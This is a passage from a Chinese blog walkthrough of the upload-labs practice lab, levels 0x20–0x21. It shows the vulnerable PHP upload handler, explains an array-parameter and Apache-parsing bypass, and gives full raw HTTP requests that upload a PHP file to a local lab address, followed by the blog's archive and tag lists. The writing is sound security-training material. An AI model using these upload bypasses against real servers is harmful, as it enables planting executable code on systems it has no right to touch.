Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.21.135:8123/Pass-20/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundary7CfGfgBPFmA65LPV
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundary7CfGfgBPFmA65LPV
Content-Disposition: form-data; name="save_name"

1.php.rar
------WebKitFormBoundary7CfGfgBPFmA65LPV
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundary7CfGfgBPFmA65LPV--

0x21 数组绕过 + apache2解析特性

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');    
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }// save_name可以是数组

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];//file 的第一个  +   file  的最后一个
            $temp_file = $_FILES['upload_file']['tmp_name'];  //temp_file 
            $img_path = UPLOAD_PATH . '/' .$file_name;             // upload/file_name 
            if (move_uploaded_file($temp_file, $img_path)) {  //下面就是移动了
                $msg = "文件上传成功！";
                $is_upload = true;
            } else {
                $msg = "文件上传失败！";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件！";
}

explode()

php > $str = 'one,two,three,four';
php > print_r(explode(',',$str));
Array
(
    [0] => one
    [1] => two
    [2] => three
    [3] => four
)

reset()

echo reset($str) . "<br>"; // 把内部指针移动到数组的首个元素

payload

POST /Pass-21/index.php HTTP/1.1
Host: 192.168.21.135:8123
Content-Length: 518
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.21.135:8123
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV2BzvDiTmcwIbW5F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4115.0 Safari/537.36 Edg/84.0.488.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.21.135:8123/Pass-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryV2BzvDiTmcwIbW5F
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.jpg"
Content-Type: image/jpeg

<?php phpinfo();?>

------WebKitFormBoundaryV2BzvDiTmcwIbW5F
Content-Disposition: form-data; name="save_name[0]"

xz.php
------WebKitFormBoundaryV2BzvDiTmcwIbW5F
Content-Disposition: form-data; name="save_name[1]"

gif
------WebKitFormBoundaryV2BzvDiTmcwIbW5F
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryV2BzvDiTmcwIbW5F--

原文作者：fe1w0

原文链接：https://fe1w0.github.io/2020/04/29/upload-labs/

发表日期：April 29th 2020, 2:18:29 am

更新日期：March 15th 2021, 12:15:19 am

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  sqli代码编写与防护
• Previous Post
  页面解析的流程学习

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 使用环境
   1. 1.1. 环境的下载与搭建
2. 2. 知识点与参考
3. 3. upload-labs
   1. 3.1. 0x01
   2. 3.2. 0x02
   3. 3.3. 0x03
   4. 3.4. 0x04
      1. 3.4.1. 方法1
      2. 3.4.2. 方法2
   5. 3.5. 0x05
   6. 3.6. 0x06
   7. 3.7. 0x07
   8. 3.8. 0x08
   9. 3.9. 0x09
   10. 3.10. 0x10
   11. 3.11. 0x11
   12. 3.12. 0x12
   13. 3.13. 0x13
   14. 3.14. 0x14
   15. 3.15. 0x15
   16. 3.16. 0x16
   17. 3.17. 0x17 二次渲染
   18. 3.18. 0x18
   19. 3.19. 0x19
   20. 3.20. 0x20
   21. 3.21. 0x21 数组绕过 + apache2解析特性



• Archive
• Tag
• Cate

Total : 48

2021

• 03/14CnHongke
• 03/14MS 14-068 && CVE-2020-1472
• 03/14Struts2
• 03/14Socks5 c/c++ 编写
• 03/14通达OA
• 03/14Fastjson 反序列化漏洞复现
• 03/14THINKPHP 漏洞复现
• 03/14VulnStack_0x02
• 03/14WebLogic 漏洞复现
• 03/14SQLI 靶场

2020

• 12/21xctf高校网络安全挑战赛-华为云专场
• 11/252020 web安全测试比赛
• 11/152020年全国大学生网络安全邀请赛暨第六届上海市大学生网络安全大赛
• 11/15php-安全知识点·杂记
• 10/16天创杯
• 10/14西湖血虐[复现]
• 09/30cumtctf2020-Web出题
• 09/13初识PHP-Parser
• 09/1220208月到9月初的wp合集
• 07/26CyBRICS CTF 2020
• 07/25安恒月赛20200725
• 07/22php_curl与docker_remote_api
• 06/18zh3r0ctf_and_hsctf
• 05/28buuctf_0x02
• 05/10VulnStack_0x01
• 05/05sqli代码编写与防护
• 04/29upload-labs
• 04/27页面解析的流程学习
• 04/262020-4中旬比赛与刷题
• 04/23数据库相关注入语句的收集和学习
• 04/062020-yctf
• 04/06数据库功能
• 03/30系统表学习
• 03/23认识数据库
• 03/16搭建web运行的基础环境
• 02/25sqli-lab
• 01/30flask
• 01/10buuctf_0x01
• 01/07CUMTCTF竞赛平台

2019

• 12/02XSS_20
• 11/18learngit
• 11/03cumt_bxs 入门与提升
• 10/19回顾与反省
• 10/07injection
• 09/28CUMTCTF2019-FINAL
• 09/239-20 wp 慢慢前行
• 09/18面对未来
• 09/17hackme wp 待续

ctf web sql-injection ssti python misc cumt Windows PHP-Parser php Struts2 xss labs life flask crypto git Socks Tools c/c++ 流量分析 mysql udf 信安之路 mysql 通达OA fastjson thinkphp 内网渗透 红日靶场 buuctf docker curl weblogic WEB环境搭建 bypass_open_basedir bypass_disable_function



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

2020-ctf 2020-ctf 2019-ctf 2021-ctf 漏洞复现 PHP XSS life flask git 项目-工具 SQLI 内网渗透 基础知识 upload 环境搭建

